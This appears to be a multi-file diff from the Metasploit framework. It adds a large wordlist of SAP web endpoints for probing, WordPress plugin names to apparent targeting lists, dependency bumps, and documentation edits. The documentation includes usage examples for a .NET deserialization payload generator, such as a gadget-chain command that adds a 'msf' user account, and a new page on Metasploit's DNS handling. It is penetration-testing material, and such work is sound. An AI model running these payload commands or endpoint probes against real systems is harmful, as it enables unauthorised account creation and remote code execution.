+sap/bc/srt/sap/RSOBJSALTERNODEREFS
+sap/bc/srt/sap/RSOBJS_ALTER_NODE_REFS
+sap/bc/srt/sap/RSOBJS_CHECK
+sap/bc/srt/sap/RSOBJS_DELETE
+sap/bc/srt/sap/RSOBJS_GET_NODES
+sap/bc/srt/sap/RSOBJS_INIT
+sap/bc/srt/sap/RSOBJS_WHERE_USED_LIST
+sap/bc/srt/sap/RSPO_SXOMS_DEFINE_PRINTER
+sap/bc/srt/sap/RSPO_SXOMS_DELETE_PRINTER
+sap/bc/srt/sap/RSPO_SXOMS_GET_DEVICE_TYPES
+sap/bc/srt/sap/RSPO_SXOMS_GET_TRAY_INFO
+sap/bc/srt/sap/RSPO_SXOMS_PUSH_ROMS_LOMS
+sap/bc/srt/sap/RSPO_SXOMS_UPDATE_PRINTER
+sap/bc/srt/sap/SAP_RPE_SEQUENCE
+sap/bc/srt/sap/SBIZC_AUTHOR
+sap/bc/srt/sap/SBIZC_AUTHORING
+sap/bc/srt/sap/SBIZC_DETAIL
+sap/bc/srt/sap/SBIZC_TEST_AUTHOR_INIT
+sap/bc/srt/sap/SBIZC_WS_TEST
+sap/bc/srt/sap/SRTFT_MASS_CONFIGURATION
+sap/bc/srt/sap/SRTFT_SYSTEM_METADATA_ACCESS
+sap/bc/srt/sap/SRT_TESTS_FB_ADD_WS
+sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST01_WS
+sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST02_WS
+sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST03_WS
+sap/bc/srt/sap/SRT_TESTS_FB_SUM_WS
+sap/bc/srt/sap/SXIDAL_FLIGHTSEATAVAIL_CHECK
+sap/bc/srt/sap/SYNCCALLSECURITYHIGHNOAUTOGEN
+sap/bc/srt/sap/SYNCCALLSECURITYLOWAUTOGEN
+sap/bc/srt/sap/TEST_WEBSERVICE_WRITE
+sap/bc/srt/sap/WDYBUILDINBOX
+sap/bc/srt/sap/WDYGETDC
+sap/bc/srt/sap/WDYGETTF
+sap/bc/srt/sap/WDYSETDC
+sap/bc/srt/sap/WDYUPDATETF
+sap/bc/srt/sap/WS_ORDER_BE_IN
+sap/bc/srt/sap/ob_wsd_test02
+sap/bc/srt/sap/xmla
+sap/bc/srt/wsil
+sap/bc/srt/xip
+sap/bc/srt/xip/sap
+sap/bc/testzone
+sap/bc/testzone/
+sap/bc/testzone/depot_select
+sap/bc/testzone/result_rep
+sap/bc/verification/
+sap/bc/verification/itsplugin
+sap/bc/verification/stateful_ping
+sap/bc/wappush
+sap/bc/wd_trace_tool
+sap/bc/wdvd
+sap/bc/webapp
+sap/bc/webdynpro
+sap/bc/webdynpro/sap
+sap/bc/webdynpro/sap/
+sap/bc/webdynpro/sap/CCMSBI_WAST_EXTR_TESTENV
+sap/bc/webdynpro/sap/CNP_LIGHT_TEST
+sap/bc/webdynpro/sap/DBA_COCKPIT
+sap/bc/webdynpro/sap/DEMO_CONTEXT_CHANGES
+sap/bc/webdynpro/sap/DEMO_ROADMAP
+sap/bc/webdynpro/sap/DEMO_SIMPLE_MAIN
+sap/bc/webdynpro/sap/DEMO_TABLE
+sap/bc/webdynpro/sap/DEMO_TABLE_WITH_TREE_BY_KEY
+sap/bc/webdynpro/sap/DEMO_TABLE_WITH_TREE_BY_NST
+sap/bc/webdynpro/sap/DemoDynamic
+sap/bc/webdynpro/sap/DemoTree
+sap/bc/webdynpro/sap/EXAMPLE_WDABAP_3
+sap/bc/webdynpro/sap/KEY_FIGURE_MONITOR
+sap/bc/webdynpro/sap/KEY_FIGURE_TREND
+sap/bc/webdynpro/sap/MASTERMIND
+sap/bc/webdynpro/sap/OTHELLO
+sap/bc/webdynpro/sap/POWL
+sap/bc/webdynpro/sap/POWL_COLLECTOR
+sap/bc/webdynpro/sap/POWL_MASTER_QUERY
+sap/bc/webdynpro/sap/POWL_PERS_COMP
+sap/bc/webdynpro/sap/RCM_DOC_CLIENT_test
+sap/bc/webdynpro/sap/RCM_ORGANIZER
+sap/bc/webdynpro/sap/RCM_RECORD
+sap/bc/webdynpro/sap/RCM_SP
+sap/bc/webdynpro/sap/RCM_SP_URL
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_ALVFNC
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_COLORS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_COLSCR
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_CV
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_EDIT
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_EVENTS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_F4
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_MIG
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_PARTS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_PROPS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_SIMPLE
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TOL
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TOOLBR
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TREE
+sap/bc/webdynpro/sap/SALV_WD_TEST_DATA
+sap/bc/webdynpro/sap/SALV_WD_TEST_DATA_DOWNLOAD
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_ALVFNC
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_COLORS
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_COLSCR
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_CV
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EDIT
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EDIT_M
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EVENTS
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_IN_WDW
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_PROPS
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_SELECT
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_SIMPLE
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_TOOLBR
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_TREE
+sap/bc/webdynpro/sap/TEST_BAD_LINK
+sap/bc/webdynpro/sap/TEST_MODIFY_VIEW
+sap/bc/webdynpro/sap/TEST_RUNTIME_REPOSITORY
+sap/bc/webdynpro/sap/TestUpload
+sap/bc/webdynpro/sap/WDK_A_SE91
+sap/bc/webdynpro/sap/WDK_SPOOL_TO_PDF
+sap/bc/webdynpro/sap/WDR_DOCU_HELPER
+sap/bc/webdynpro/sap/WDR_MESSAGE_AREA
+sap/bc/webdynpro/sap/WDR_TEST_ADOBE
+sap/bc/webdynpro/sap/WDR_TEST_DDIC_SHLP
+sap/bc/webdynpro/sap/WDR_TEST_DOCU
+sap/bc/webdynpro/sap/WDR_TEST_EVENTS
+sap/bc/webdynpro/sap/WDR_TEST_ICON_SOURCES
+sap/bc/webdynpro/sap/WDR_TEST_IT05
+sap/bc/webdynpro/sap/WDR_TEST_JNDI_PROVIDER
+sap/bc/webdynpro/sap/WDR_TEST_LAYOUTS
+sap/bc/webdynpro/sap/WDR_TEST_MODIFY_VIEW
+sap/bc/webdynpro/sap/WDR_TEST_NAVIGATION
+sap/bc/webdynpro/sap/WDR_TEST_OVS
+sap/bc/webdynpro/sap/WDR_TEST_P00001
+sap/bc/webdynpro/sap/WDR_TEST_P00002
+sap/bc/webdynpro/sap/WDR_TEST_P00003
+sap/bc/webdynpro/sap/WDR_TEST_P13N
+sap/bc/webdynpro/sap/WDR_TEST_POPUPS
+sap/bc/webdynpro/sap/WDR_TEST_POPUPS_RT
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE2
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE_POP
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC2
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC_POP
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_OBN
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_PAGE
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_TARGET
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_POPUP
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_WS
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_WS_IN
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_WORKPROTECT
+sap/bc/webdynpro/sap/WDR_TEST_RUNTIME
+sap/bc/webdynpro/sap/WDR_TEST_TABLE
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_CHILD
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_CLOSE
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_LOGOFF
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_RESUME
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUITE
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUSRES_A
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUSRES_B
+sap/bc/webdynpro/sap/WDR_UIE_LIBRARY
+sap/bc/webdynpro/sap/apb_launchpad
+sap/bc/webdynpro/sap/apb_launchpad_nwbc
+sap/bc/webdynpro/sap/apb_lpd_light_start
+sap/bc/webdynpro/sap/apb_lpd_start_url
+sap/bc/webdynpro/sap/appl_log_trc_viewer
+sap/bc/webdynpro/sap/appl_soap_management
+sap/bc/webdynpro/sap/application_exit
+sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
+sap/bc/webdynpro/sap/cnp_light_test
+sap/bc/webdynpro/sap/configure_application
+sap/bc/webdynpro/sap/configure_component
+sap/bc/webdynpro/sap/demo_messages
+sap/bc/webdynpro/sap/demo_messages2
+sap/bc/webdynpro/sap/demo_variable_dropdown
+sap/bc/webdynpro/sap/demo_wda_quiz
+sap/bc/webdynpro/sap/demo_wda_table
+sap/bc/webdynpro/sap/esh_adm_smoketest_ui
+sap/bc/webdynpro/sap/esh_admin_ui_component
+sap/bc/webdynpro/sap/esh_eng_modelling
+sap/bc/webdynpro/sap/esh_search_results.ui
+sap/bc/webdynpro/sap/ios_test_helloworld_ms
+sap/bc/webdynpro/sap/ios_test_helloworld_so
+sap/bc/webdynpro/sap/ios_test_simple_ms
+sap/bc/webdynpro/sap/ios_test_simple_so
+sap/bc/webdynpro/sap/its
+sap/bc/webdynpro/sap/powl_test_feeder
+sap/bc/webdynpro/sap/ptm_assign_s_ui
+sap/bc/webdynpro/sap/ptm_jf_worklist_ui
+sap/bc/webdynpro/sap/ptm_maintain_jf_ui
+sap/bc/webdynpro/sap/rcm_multistring_edit_example
+sap/bc/webdynpro/sap/rcm_poid_info_example
+sap/bc/webdynpro/sap/rcm_property_query_example
+sap/bc/webdynpro/sap/salv_wd_demo_table_dfault
+sap/bc/webdynpro/sap/salv_wd_submit
+sap/bc/webdynpro/sap/salv_wd_test_col_field
+sap/bc/webdynpro/sap/salv_wd_test_conf_caller
+sap/bc/webdynpro/sap/salv_wd_test_config1
+sap/bc/webdynpro/sap/salv_wd_test_config_api
+sap/bc/webdynpro/sap/salv_wd_test_config_api2
+sap/bc/webdynpro/sap/salv_wd_test_datatypes
+sap/bc/webdynpro/sap/salv_wd_test_dyn1
+sap/bc/webdynpro/sap/salv_wd_test_extended
+sap/bc/webdynpro/sap/salv_wd_test_file_upload
+sap/bc/webdynpro/sap/salv_wd_test_image1
+sap/bc/webdynpro/sap/salv_wd_test_modif1
+sap/bc/webdynpro/sap/salv_wd_test_no_ddic
+sap/bc/webdynpro/sap/salv_wd_test_non_portal
+sap/bc/webdynpro/sap/salv_wd_test_set_data
+sap/bc/webdynpro/sap/salv_wd_test_set_data1
+sap/bc/webdynpro/sap/salv_wd_test_simple1
+sap/bc/webdynpro/sap/salv_wd_test_table_edit2
+sap/bc/webdynpro/sap/salv_wd_test_table_f4
+sap/bc/webdynpro/sap/salv_wd_test_table_tol
+sap/bc/webdynpro/sap/salv_wd_test_table_tol2
+sap/bc/webdynpro/sap/salv_wd_test_translation
+sap/bc/webdynpro/sap/sh_adm_smoketest_files
+sap/bc/webdynpro/sap/test_ddic
+sap/bc/webdynpro/sap/wd_analyze_config_appl
+sap/bc/webdynpro/sap/wd_analyze_config_comp
+sap/bc/webdynpro/sap/wd_analyze_config_default
+sap/bc/webdynpro/sap/wd_analyze_config_user
+sap/bc/webdynpro/sap/wd_layout_cnp_light
+sap/bc/webdynpro/sap/wd_personalize_ddic_valuehelp
+sap/bc/webdynpro/sap/wd_tut_alv
+sap/bc/webdynpro/sap/wd_tut_componentdetail
+sap/bc/webdynpro/sap/wd_tut_componentusage
+sap/bc/webdynpro/sap/wd_tut_dialogboxes
+sap/bc/webdynpro/sap/wdhc_application
+sap/bc/webdynpro/sap/wdk_gaf_template
+sap/bc/webdynpro/sap/wdk_oif_template
+sap/bc/webdynpro/sap/wdk_qaf_template
+sap/bc/webdynpro/sap/wdr_inplace_demo1
+sap/bc/webdynpro/sap/wdr_inplace_demo2
+sap/bc/webdynpro/sap/wdr_ovs_test
+sap/bc/webdynpro/sap/wdr_package_srvs
+sap/bc/webdynpro/sap/wdr_popup_to_confirm_test
+sap/bc/webdynpro/sap/wdr_replace_if_wdl
+sap/bc/webdynpro/sap/wdr_test_adobe_pdf_only
+sap/bc/webdynpro/sap/wdr_test_appl_def_vh
+sap/bc/webdynpro/sap/wdr_test_application_api
+sap/bc/webdynpro/sap/wdr_test_bg_blend
+sap/bc/webdynpro/sap/wdr_test_chat
+sap/bc/webdynpro/sap/wdr_test_cmp_usage_group
+sap/bc/webdynpro/sap/wdr_test_cmpusage
+sap/bc/webdynpro/sap/wdr_test_cmpusage4
+sap/bc/webdynpro/sap/wdr_test_config
+sap/bc/webdynpro/sap/wdr_test_config2
+sap/bc/webdynpro/sap/wdr_test_configmain
+sap/bc/webdynpro/sap/wdr_test_context
+sap/bc/webdynpro/sap/wdr_test_dynamic
+sap/bc/webdynpro/sap/wdr_test_enhancements
+sap/bc/webdynpro/sap/wdr_test_exit_plug
+sap/bc/webdynpro/sap/wdr_test_ext_mapping
+sap/bc/webdynpro/sap/wdr_test_extended_path
+sap/bc/webdynpro/sap/wdr_test_gantt
+sap/bc/webdynpro/sap/wdr_test_global_settings
+sap/bc/webdynpro/sap/wdr_test_help
+sap/bc/webdynpro/sap/wdr_test_input
+sap/bc/webdynpro/sap/wdr_test_it05_nopatt
+sap/bc/webdynpro/sap/wdr_test_mailto
+sap/bc/webdynpro/sap/wdr_test_mandatory
+sap/bc/webdynpro/sap/wdr_test_misc
+sap/bc/webdynpro/sap/wdr_test_msg_manager_00
+sap/bc/webdynpro/sap/wdr_test_navigation6
+sap/bc/webdynpro/sap/wdr_test_navigation7
+sap/bc/webdynpro/sap/wdr_test_navigation_00
+sap/bc/webdynpro/sap/wdr_test_ovs2
+sap/bc/webdynpro/sap/wdr_test_p00004
+sap/bc/webdynpro/sap/wdr_test_p00006
+sap/bc/webdynpro/sap/wdr_test_p00007
+sap/bc/webdynpro/sap/wdr_test_p00008
+sap/bc/webdynpro/sap/wdr_test_p00009
+sap/bc/webdynpro/sap/wdr_test_p00010
+sap/bc/webdynpro/sap/wdr_test_p00011
+sap/bc/webdynpro/sap/wdr_test_paddless_window
+sap/bc/webdynpro/sap/wdr_test_pers_imp
+sap/bc/webdynpro/sap/wdr_test_pers_imp_exp
+sap/bc/webdynpro/sap/wdr_test_popup_01
+sap/bc/webdynpro/sap/wdr_test_popup_inplug
+sap/bc/webdynpro/sap/wdr_test_popup_to_confirm
+sap/bc/webdynpro/sap/wdr_test_popups_rt
+sap/bc/webdynpro/sap/wdr_test_popups_rt_00
+sap/bc/webdynpro/sap/wdr_test_select_options
+sap/bc/webdynpro/sap/wdr_test_ui_elements
+sap/bc/webdynpro/sap/wdr_test_ur_browser
+sap/bc/webdynpro/sap/wdr_transport_srvs
+sap/bc/webdynpro/sap/wdt_alv
+sap/bc/webdynpro/sap/wdt_bg_scatter
+sap/bc/webdynpro/sap/wdt_componentdetail
+sap/bc/webdynpro/sap/wdt_componentusage
+sap/bc/webdynpro/sap/wdt_dialogboxes
+sap/bc/webdynpro/sap/wdt_ext_map_reuse
+sap/bc/webdynpro/sap/wdt_flightlist
+sap/bc/webdynpro/sap/wdt_master_detail
+sap/bc/webdynpro/sap/wdt_quiz
+sap/bc/webdynpro/sap/wdt_table
+sap/bc/webdynpro/sap/wdt_tree
+sap/bc/webdynpro/sap/wdt_tree_table_by_key
+sap/bc/webflow
+sap/bc/webflow/
+sap/bc/webflow/demo
+sap/bc/webflow/demo/
+sap/bc/webflow/demo/trareq_update
+sap/bc/webflow/demo/wf_demo_calc_01
+sap/bc/webflow/test
+sap/bc/webflow/test/
+sap/bc/webflow/test/get_data
+sap/bc/webflow/test/inc_async
+sap/bc/webflow/test/inc_sync
+sap/bc/webflow/test/test_datatypes
+sap/bc/webflow/test/test_get_xml
+sap/bc/webflow/test/test_show_xml
+sap/bc/webflow/wshandler
+sap/bc/webrfc
+sap/bc/workflow
+sap/bc/workflow/
+sap/bc/workflow/shortcut
+sap/bc/workflow/workflow_api
+sap/bc/workflow_xml
+sap/bc/xmb
+sap/bc/xml
+sap/bc/xmsmsg
+sap/bc/xrfc
+sap/bc/xrfc_test
+sap/bw
+sap/ca
+sap/ca/att_provide
+sap/crm
+sap/es/cockpit
+sap/es/getdocument
+sap/es/opensearch
+sap/es/opensearch/description
+sap/es/opensearch/list
+sap/es/opensearch/search
+sap/es/redirect
+sap/es/saplink
+sap/es/search
+sap/icm/admin
+sap/meData
+sap/monitoring
+sap/monitoring/
+sap/monitoring/ComponentInfo
+sap/monitoring/SystemInfo
+sap/option
+sap/public
+sap/public/
+sap/public/bc
+sap/public/bc/
+sap/public/bc/NWDEMO_MODEL
+sap/public/bc/NW_ESH_TST_AUTO
+sap/public/bc/icons
+sap/public/bc/icons_rtl
+sap/public/bc/its
+sap/public/bc/its/
+sap/public/bc/its/designs
+sap/public/bc/its/mimes
+sap/public/bc/its/mimes/system/SL/page/hourglass.html
+sap/public/bc/its/mobile/itsmobile00
+sap/public/bc/its/mobile/itsmobile01
+sap/public/bc/its/mobile/rfid
+sap/public/bc/its/mobile/start
+sap/public/bc/its/mobile/test
+sap/public/bc/pictograms
+sap/public/bc/sicf_login_run
+sap/public/bc/trex
+sap/public/bc/ur
+sap/public/bc/wdtracetool
+sap/public/bc/webdynpro
+sap/public/bc/webdynpro/
+sap/public/bc/webdynpro/ViewDesigner
+sap/public/bc/webdynpro/adobeChallenge
+sap/public/bc/webdynpro/adobechallenge
+sap/public/bc/webdynpro/mimes
+sap/public/bc/webdynpro/ssr
+sap/public/bc/webdynpro/viewdesigner
+sap/public/bc/webicons
+sap/public/bc/workflow
+sap/public/bc/workflow/shortcut
+sap/public/bsp
+sap/public/bsp/sap
+sap/public/bsp/sap/
+sap/public/bsp/sap/htmlb
+sap/public/bsp/sap/public
+sap/public/bsp/sap/public/
+sap/public/bsp/sap/public/ISE
+sap/public/bsp/sap/public/bc
+sap/public/bsp/sap/public/faa
+sap/public/bsp/sap/public/graphics
+sap/public/bsp/sap/public/graphics/
+sap/public/bsp/sap/public/graphics/jnet_handler
+sap/public/bsp/sap/public/graphics/mimes
+sap/public/bsp/sap/system
+sap/public/bsp/sap/system_public
+sap/public/icf_check
+sap/public/icf_info
+sap/public/icf_info/
+sap/public/icf_info/icr_groups
+sap/public/icf_info/icr_urlprefix
+sap/public/icf_info/logon_groups
+sap/public/icf_info/urlprefix
+sap/public/icman
+sap/public/info
+sap/public/myssocntl
+sap/public/ping
+sap/wdvd
+sap/webcuif
+sap/webdynpro/sap/hap_main_document
+sap/webdynpro/sap/hap_start_page_powl_ui_ess
+sap/webdynpro/sap/hap_store_page_powl_ui_mss
+sap/webdynpro/sap/hrtmc_employee_profile
+sap/webdynpro/sap/hrtmc_rm_maintenance
+sap/webdynpro/sap/hrtmc_ta_assessment
+sap/webdynpro/sap/hrtmc_ta_dashboard
+sap/webdynpro/sap/wd_analyze_config_user
+sap/xi
+sap/xi/
+sap/xi/adapter_plain
+sap/xi/cache
+sap/xi/cache_gui
+sap/xi/cache_gui_ssl
+sap/xi/cache_ssl
+sap/xi/docu_apperror
+sap/xi/docu_syserror
+sap/xi/engine
+sap/xi/engine_test
+sap/xi/simulation
+sap/xml/
+sap/xml/cwm
+sap/xml/soap
+sap/xml/soap/xmla
+sap/xml/soap/xmla/fault
+sap_java
+sap_java/bc
+sapmc
+sapmc/sapmc.html
+sapse/startsld
+servlet/com.sap.admin.Critical.Actio
+sim/
+sim/config/testdata.jsp
+sim/config/testerror.jsp
+sim/index.html
+sld
+slm
+slmServices/config
+slmServices/config?wsdl
+slmSolManServices/Config1
+socoview
+socoview/flddisplay.asp
+sp
+spml
+sysconfig
+tc.lm.webadmin.endtoend.public.app
+tc/lm/webadmin/clusteradmin
+teched/test
+test30
+top.html
+uddi
+uddiclient
+uddiclient/jsps/index.jsp
+useradmin
+useradmin/index.jsp
+userhome/
+utl
+vscantest
+vscantest/
+webdynpro
+webdynpro/dispatcher
+webdynpro/dispatcher/sap.com/grc~accvwdcomp
+webdynpro/dispatcher/sap.com/grc~aewebquery
+webdynpro/dispatcher/sap.com/grc~ccappcomp
+webdynpro/dispatcher/sap.com/grc~ccxsysbe
+webdynpro/dispatcher/sap.com/grc~ccxsysbehr
+webdynpro/dispatcher/sap.com/grc~ffappcomp
+webdynpro/dispatcher/sap.com/pb/pagebuilder
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
+webdynpro/dispatcher/sap.com/tc~lm~webadmin~mainframe~wd/WebAdminApp
+webdynpro/dispatcher/sap.com/tc~sec~ume~wd~enduser/UmeEnduserApp
+webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
+webdynpro/dispatcher/sap.com/tc~wd~tools
+webdynpro/dispatcher/sap.com/tc~wd~tools/Explorer
+webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
+webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
+webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
+webdynpro/resources/sap.com/
+webdynpro/welcome
+webdynpro/welcome/Welcome.jsp
+wsd2wsdl
+wsnavigator
+wsnavigator/enterwsdl.html
+wsnavigator/jsps/redirect.jsp
+wsnavigator/jsps/sendrequest.jsp
+wsnavigator/jsps/test.jsp
+wssproc/cert
+wssproc/plain
+wssproc/ssl
@@ -61,3 +61,4 @@ woocommerce-payments
 file-manager-advanced-shortcode
 royal-elementor-addons
 backup-backup
+hash-form
@@ -1,2 +1,3 @@
 holding_pattern
 wplms
+bricks
@@ -34566,6 +34566,7 @@ hash-comment-ip
 hash-converter
 hash-coupon
 hash-elements
+hash-form
 hash-hash-tags
 hash-link-scroll-offset
 hashbar-wp-notification-bar
@@ -1 +1 @@
-3.0.5
+3.1.5
@@ -76,11 +76,13 @@ GEM
    rb-fsevent (0.11.2)
    rb-inotify (0.10.1)
      ffi (~> 1.0)
-    rexml (3.2.5)
+    rexml (3.2.7)
+      strscan (>= 3.0.9)
    rouge (4.0.0)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
+    strscan (3.1.0)
    terminal-table (3.0.2)
      unicode-display_width (>= 1.1.1, < 3)
    unicode-display_width (2.3.0)
@@ -32,7 +32,7 @@ exclude:
 # just-the-docs config
 mermaid_enabled: true
 mermaid:
-  version: "9.2.2"
+  version: "10.8.0"
 heading_anchors: true
 aux_links_new_tab: true
 aux_links:
@@ -342,7 +342,7 @@ The result object now as a `.to_h` method which returns a hash compatible with o

 In the case of a success we build some info hashes and call `create_credential`. This is a method found in the metasploit-credential gem under `lib/metasploit/credential/creation.rb` in a mixin called `Metasploit::Credential::Creation`. This mixin is included in the Report mixin, so if your module includes that mixin you'll get these methods for free.

-`create_credential` creates a `Metasploit::Credential::Core`. We then take that core, the service data, and merge it with some additional data. This additional data includes the access level, the current time (to update last_attempted_at on the `Metasploit::Credential::Login`), the the status. 
+`create_credential` creates a `Metasploit::Credential::Core`. We then take that core, the service data, and merge it with some additional data. This additional data includes the access level, the current time (to update last_attempted_at on the `Metasploit::Credential::Login`), the status. 

 Finally, for a success, we output the result to the console.

@@ -70,3 +70,4 @@ Example:
 | FIRST_ATTEMPT_FAIL | The module may fail for the first attempt |
 | REPEATABLE_SESSION | The module is expected to get a session every time it runs |
 | UNRELIABLE_SESSION | The module isn't expected to get a shell reliably (such as only once) |
+| EVENT_DEPENDENT    | The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc |
@@ -82,24 +82,41 @@ Generate a .NET deserialization payload that will execute an operating system
 command using the specified gadget chain and formatter.

 Available formatters:
-   * BinaryFormatter
-   * LosFormatter
-   * SoapFormatter
+  * BinaryFormatter
+  * LosFormatter
+  * SoapFormatter

 Available gadget chains:
-   * TextFormattingRunProperties
-   * TypeConfuseDelegate
-   * WindowsIdentity
+  * ClaimsPrincipal
+  * DataSet
+  * DataSetTypeSpoof
+  * ObjectDataProvider
+  * TextFormattingRunProperties
+  * TypeConfuseDelegate
+  * WindowsIdentity

-Example: ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TextFormattingRunProperties
+Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5

-Specific options:
-   -c, --command   <String>         The command to run
-   -f, --formatter <String>         The formatter to use (default: BinaryFormatter)
-   -g, --gadget    <String>         The gadget chain to use (default: TextFormattingRunProperties)
-   -o, --output    <String>         The output format to use (default: raw, see: --list-output-formats)
-       --list-output-formats        List available output formats, for use with --output
-   -h, --help                       Show this message
+Examples:
+  ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base64
+  ./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
+    --viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1
+
+General options:
+    -h, --help                       Show this message
+    -c, --command   <String>         The command to run
+    -f, --formatter <String>         The formatter to use (default: BinaryFormatter)
+    -g, --gadget    <String>         The gadget chain to use (default: TextFormattingRunProperties)
+    -o, --output    <String>         The output format to use (default: raw, see: --list-output-formats)
+        --list-output-formats        List available output formats, for use with --output
+
+ViewState related options:
+        --viewstate-generator             <String>
+                                     The ViewState generator string to use
+        --viewstate-validation-algorithm  <String>
+                                     The validation algorithm (default: SHA1, see: Available HMAC algorithms)
+        --viewstate-validation-key        <HexString>
+                                     The validationKey from the web.config file
 ```

 The `-g` / `--gadget` option maps to the *gadget_chain* argument for the
@@ -0,0 +1,165 @@
+# Metasploit DNS
+## Background
+Most applications that need to handle hostname to IP address lookups rely on the host operating system, either by
+passing the hostname directly to the socket-creation function or by calling a purpose built API such as `getaddrinfo`.
+This was also how Metasploit handled name lookups and would only directly communicate with a DNS server when the request
+was more involved than mapping a hostname to an IPv4 or IPv6 address.
+
+One flaw in this approach is that when pivoting connections over a session, the DNS lookups would occur through the host
+on which Metasploit was running instead of the compromised host from which the connection would originate. This lead to
+two issues, the first being the aforementioned DNS leaks and the second that Metasploit could not always resolve
+hostnames that the compromised system could.
+
+Starting in Metasploit 6.4, Metasploit uses an internal DNS resolution system that grants the user a high degree of
+control over the process of DNS queries.
+
+## The DNS command
+Metasploit's DNS configuration is controlled by the `dns` command which has multiple subcommands.
+
+The current configuration can be printed by running `dns print`:
+
+```msf6
+msf6 > dns print
+Default search domain: N/A
+Default search list:   lab.lan
+Current cache size:    0
+
+Resolver rule entries
+=====================
+
+   #  Rule    Resolver    Comm channel
+   -  ----    --------    ------------
+   1  *                   
+   .    \_    static      N/A
+   .    \_    127.0.0.53  
+
+
+Static hostnames
+================
+
+   Hostname                 IPv4 Address   IPv6 Address
+   --------                 ------------   ------------
+   localhost                127.0.0.1      ::1
+     \_                     127.1.1.1      
+   localhost.localdomain    127.0.0.1      ::1
+   localhost4               127.0.0.1      
+   localhost4.localdomain4  127.0.0.1      
+   localhost6                              ::1
+   localhost6.localdomain6                 ::1
+```
+
+The `help` subcommand can be used to display the available subcommands. The name of a subcommand can also be specified 
+as an argument to `help` to display additional information about that subcommand, for example `dns help add`.
+
+Metasploit's DNS system is composed of the following major components: resolver rules, static entries and the cache.
+
+## DNS Resolver Rules
+DNS resolver rules are a single wildcard that is associated with zero or more resolver types. When a query name matches
+the wildcard expression, the associated resolvers are used in succession until one is capable of fulfilling the request.
+For example, a wildcard pattern of `*.lab.lan` would match `www.lab.lan` and `_ldap._tcp.lab.lan`, but not `lab.lan` or
+`msflab.lan`. Furthermore, the `*` wildcard pattern matches everything and should be used as a default rule.
+
+Once a rule that matches the query name is found, the specified resolvers will be tried in order until one is capable of
+handling the request. Different resolver types can be specified to handle queries in different ways. Rules are listed
+in numeric order starting at position 1. Rules can be added to or removed from specific positions in a similar manner to
